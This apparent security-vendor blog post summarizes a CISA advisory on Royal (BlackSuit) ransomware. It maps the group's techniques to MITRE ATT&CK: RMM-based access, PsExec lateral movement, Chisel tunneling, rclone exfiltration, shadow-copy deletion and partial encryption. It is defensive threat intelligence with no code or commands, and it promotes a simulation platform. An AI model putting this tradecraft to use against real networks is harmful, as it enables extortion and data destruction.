CISA Alert AA23-061A: BlackSuit (Royal) Ransomware Analysis, Simulation, and TTPs

Updated on August 9th, 2024: Royal ransomware rebranded itself as BlackSuit ransomware and adopted new TTPs. This blog is updated in August 2024 to reflect these changes.

On March 2nd, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Royal ransomware that targets healthcare, communications, manufacturing, and education organizations in the United States [1]. Royal ransomware threat actors use a wide variety of techniques for initial access, defense evasion, and encryption to increase the number of their victims and improve impact. In August 2024, the group rebranded itself as BlackSuit ransomware and adopted new tactics, techniques, and procedures (TTPs) to its arsenal.

Picus Threat Library already had attack simulations for Royal ransomware. In this blog, we explain TTPs used by the Royal ransomware group and how you can assess your security posture against Royal ransomware attacks.

Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform

Royal Ransomware Rebranded as BlackSuit Ransomware

Royal ransomware (aka BlackSuit, DEV-0569) was first observed back in September 2022. The ransomware group does not utilize the Ransomware-as-a-Service business model, and they do not target specific sectors or countries. Notable targets are critical infrastructure sectors in the United States and Brazil. It is estimated that Royal ransomware impacted more than 70 organizations worldwide.

Figure 1: Distribution of Royal Ransomware Attacks by Countries [2]

Royal ransomware threat actors use the double extortion method by both stealing and encrypting their victims' data. The exfiltrated data is used as proof of infection and the threat of releasing sensitive data to the public to pressure the victims to pay the ransom demanded. After encrypting their victims' data, Royal ransomware appends the encrypted files with the "royal_u" file extension and leaves a ransom note. The ransom demands range between $1 million and $11 million in Bitcoin.

Royal ransomware developers, who used to be part of the Conti ransomware, quickly incorporate new techniques into their ransomware attacks. For this reason, analysis shows multiple initial access and defense evasion techniques in different attack campaigns.

In August 2024, the group rebranded itself as BlackSuit ransomware and added new adversary techniques to its toolset. The newer ransomware payload appends the encrypted files with the "royal_w" file extension and leaves a ransom note named "readme.BlackSuit.txt".

TTPs Used by Royal (BlackSuit) Ransomware

Tactic: Initial Access & Persistence

T1133 External Remote Services

Royal ransomware threat actors utilize remote monitoring and management (RMM) software to gain initial access to their victims' computers. Threat actors convince their victims to install RMM software using social engineering. This technique also allows adversaries to establish persistence in the victims' systems.

T1190 Exploit Public-Facing Application

Adversaries exploit vulnerable VMware ESXi servers to gain initial access. Many other ransomware variants also abuse similar vulnerabilities, and organizations are advised to patch their vulnerable ESXi servers.

T1566 Phishing

Royal ransomware attackers use phishing emails with malicious PDF attachments and malvertisement links. Phishing emails are used to lure victims into installing RMM software. 

Tactic: Execution

T1059 Command and Scripting Interpreter

Royal ransomware uses batch scripts to execute commands in infected systems. These scripts help adversaries to 

• add new users to the infected system (T1078 Valid Accounts)
• force group policy update (T1484 Domain Policy Modification)
• run reconnaissance and collect information about the victim (T1119 Automated Collection)
• download additional malware to establish persistence (T1105 Ingress Tool Transfer)
• delete malicious artifacts to avoid further analysis (T1070 Indicator Removal)

Tactic: Defense Evasion

T1562: Impair Defenses & T1484 Domain Policy Modification

Royal ransomware threat actors disable antivirus software and subvert antivirus protocols to avoid detection during data encryption and exfiltration.

Tactic: Lateral Movement

T1021: Remote Services

Adversaries use PsExec, a Microsoft SysInternals tool, to move laterally in the victim's network. In some cases, threat actors compromised the domain controller via valid accounts.

Tactic: Command and Control (C2)

T1105 Ingress Tool Transfer

Royal ransomware threat actors transfer additional malware and RMM software such as AnyDesk, Atera, and LogMeIn from their C2 servers after they gain access to the victims' systems.

T1572 Protocol Tunneling

Adversaries use an open-source tunneling tool named Chisel to communicate with their C2 servers. The communication is secured via SSH.

Tactic: Exfiltration

T1041 Exfiltration over C2 Channel

Royal ransomware uses Cobalt Strike, MegaCMD, rclone, SharpExfil, and Ursnif/Gozi for data exfiltration to their C2 servers.

Tactic: Impact

T1486 Data Encrypted for Impact

Royal ransomware uses a custom encryption method that partially encrypts the files based on their file size to avoid detection. The partial encryption is based on the "ep" parameter used when executing the ransomware payload.

• If the file size is smaller than 5245 MB or "ep" is set to 100, the entire file is encrypted.
• If the file size is larger than 5245 MB and "ep" is not set to 100, the file is encrypted by the percentage of the "ep" parameter. 
• If the file size is larger than 5245 MB and there is no "ep" parameter, 50% of the file is encrypted.

The ransomware uses Windows Restart Manager to identify files in use or blocked by other applications. The newer ransomware payload appends the encrypted files with the "royal_w" file extension and leaves a ransom note named "readme.BlackSuit.txt".

T1490 Inhibit System Recovery

Royal ransomware uses vssadmin, Windows Volume Shadow Copy service, to delete volume shadow copies. This action prevents victims from using the built-in recovery system to recover the encrypted files. This technique is also used as a defense evasion technique to delete system logs after exfiltration (T1070 Indicator Removal).

How Picus Helps Simulate Royal Ransomware Attacks?

We also strongly suggest simulating Royal ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware, such as Conti, Zeon, and ESXiArgs, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Royal (BlackSuit) ransomware: 

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Royal ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Royal (BlackSuit) ransomware:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of Picus Security Validation Platform.

References

[1] "#StopRansomware: Royal Ransomware," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a. [Accessed: Mar. 04, 2023]

[2] "Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks," Trend Micro, Dec. 21, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html. [Accessed: Mar. 04, 2023]